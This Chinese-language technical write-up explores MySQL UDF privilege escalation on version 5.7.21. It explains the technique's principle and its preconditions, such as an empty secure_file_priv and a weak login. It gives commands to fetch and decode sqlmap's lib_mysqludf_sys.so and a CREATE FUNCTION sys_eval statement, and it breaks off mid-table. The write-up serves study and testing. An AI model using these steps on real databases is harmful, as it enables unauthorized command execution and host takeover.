MySQL UDF 提权初探

MySQL UDF 提权初探

对 MySQL UDF 提权做一次探究，什么情况下可以提权，提取的主机权限是否跟mysqld进程启动的主机账号有关

数据库信息

MySQL数据库版本:5.7.21

UDF

UDF：(User Defined Function) 用户自定义函数，MySQL数据库的初衷是用于方便用户进行自定义函数，方便查询一些复杂的数据，同时也有可能被攻击者利用，使用udf进行提权。

提权原理：攻击者通过编写调用cmd或者shell的共享库文件（window为.dll，linux为.so），并且导入到一个指定的文件夹目录下，创建一个指向共享库文件的自定义函数，从而在数据库中的查询就等价于在cmd或者shell中执行命令。

执行过程：本质上还是利用了MySQL能够执行系统命令的特点。具体过程如下

（1）攻击者编写一些可以调用cmd或者shell的共享库文件（window为.dll，linux为.so），将共享库导入指定的函数目录中。

（2）在MySQL中创建指向共享库文件的自定义函数。

（3）通过刚刚创建的函数执行系统命令，实现提权。

漏洞详情

当mysql配置secure_file_priv项为空或者secure_file_priv项为plugin文件夹，且可以用弱口令登录数据库，存在udf提权漏洞。

1. 查看漏洞利用条件：secure_file_priv为空或者为plugin文件夹，可以登录数据库，存在plugin文件夹

2. 将udf.so文件导入相关plugin文件夹下

3. 使用udf创建自定义函数 Create function sys_eval returns string soname ‘udf.so’;

4. 使用自定义函数执行任意代码执行：

获取so文件

$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
python3 cloak.py -d -i /tmp/sqlmap-dev/data/udf/mysql/linux/64/lib_mysqludf_sys.so_

$ ll /tmp/sqlmap-dev/data/udf/mysql/linux/64/
-rw-rw-r-- 1 mysql mysql 8040 May 21 15:17 lib_mysqludf_sys.so
-rw-rw-r-- 1 mysql mysql 3200 May 21 15:17 lib_mysqludf_sys.so_

root账号拉起mysqld进程

secure_file_priv=''

mysql> show variables like '%secure_file_priv%';
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv |                |
+------------------+----------------+
mysql> show variables like '%plugin%';
+-------------------------------+------------------------------------+
| Variable_name                 | Value                              |
+-------------------------------+------------------------------------+